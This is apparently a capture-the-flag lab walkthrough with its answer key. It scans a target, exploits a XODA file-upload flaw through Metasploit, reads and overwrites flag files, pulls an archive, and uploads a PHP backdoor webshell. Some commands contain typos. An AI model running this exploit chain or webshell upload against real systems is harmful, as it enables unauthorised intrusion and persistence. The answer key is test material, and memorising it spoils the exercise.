Check the present working directory on remote (exploited) machine.
List the files present in present working directory of the remote machine.
Check the present working directory on local (attacker) machine.
List the files present in present working directory of the local machine.
Get the flag value present in /app/flag1 file.
Change the flag value present in /app/flag1, so that no one else can get the right flag.
Change the present working directory to a suspiciously named directory in /app and read the flag from a hidden file present in that directory.
Get the flag5.zip to local machine, open it using password 56784. The information given in the extracted file will give clue about the location of the another flag.
Delete the .zip file from the directory.
Print checksum of file mentioned in the extracted file (Refer to Q8).
Check the PATH environment variable on the remote machine.
There is a file with string “ckdo” in its name in one of the places included in PATH variable. Print the flag hidden in that file.
Change to tools directory on the local machine.
Upload a PHP webshell to app directory of the remote machine.





root@attackdefense:~# nmap -sP 192.x.x.x/24 -T4
nmap -A -p- -T4 192.x.x.x -v
nikto -host 192.x.x.x:80
arachni http://192.x.x.x:80
MSFconsole
use exploit/unix/webapp/xoda_file_upload
set rhosts 192.x.x.x
set targeturi /
run

pwd
ls
lpwd
lls

cat /app/flag1
execute -f "/bin/bash" -a "echo 0 > /app/flag1"
cat /app/flag1

cd /app
ls -al

cs "Secret Files"
ls
cat .flag2
ls
download flag5.zip
unzip flag5.zip
rm flag5.zip
md5sum /bin/bash
getenv PATH

search -d /usr/bing -f *chdo*
lcd ./tools
lpwd
ls
root@attackdefense:~# cp /usr/share/webshells/php/php-backdoor.php tools/
cd /var/www
ls

be able to see the backdoor on the webserver




answers to questions:
Q1. Check the present working directory on remote (exploited) machine.
A. pwd  

Q2. List the files present in present working directory of the remote machine.
A. ls

Q3. Check the present working directory on local (attacker) machine.
A. lpwd

Q4. List the files present in present working directory of the local machine.
A. lls

Q5. Get the flag value present in /app/flag1 file.
A. cat /app/flag1

Q6. Change the flag value present in /app/flag1, so that no one else can get the right flag.
A. edit /app/flag1

Q7. Change the present working directory to a suspiciously named directory in /app and read the flag from a hidden file present in that directory.
A. cd "Secret Files";  cat .flag2

Q8. Get the flag5.zip to local machine, open it using password 56784. The information given in the extracted file will give clue about the location of the another flag.
A. download flag5.zip;  unzip flag5.zip;  cat list

Q9. Delete the .zip file from the directory.
A. rm flag5.zip

Q10. Print checksum of file mentioned in the extracted file (Refer to Q8).
A. checksum md5 /bin/bash

Q11. Check the PATH environment variable on the remote machine.
A. getenv PATH

Q12. There is a file with string “ckdo” in its name in one of the places included in PATH variable. Print the flag hidden in that file.
A. search -d /usr/bin -f *ckdo*

Q13. Change to tools directory on the local machine.
A. lcd tools

Q14. Upload a PHP webshell to app directory of the remote machine.
A. upload /usr/share/webshells/php/php-backdoor.php
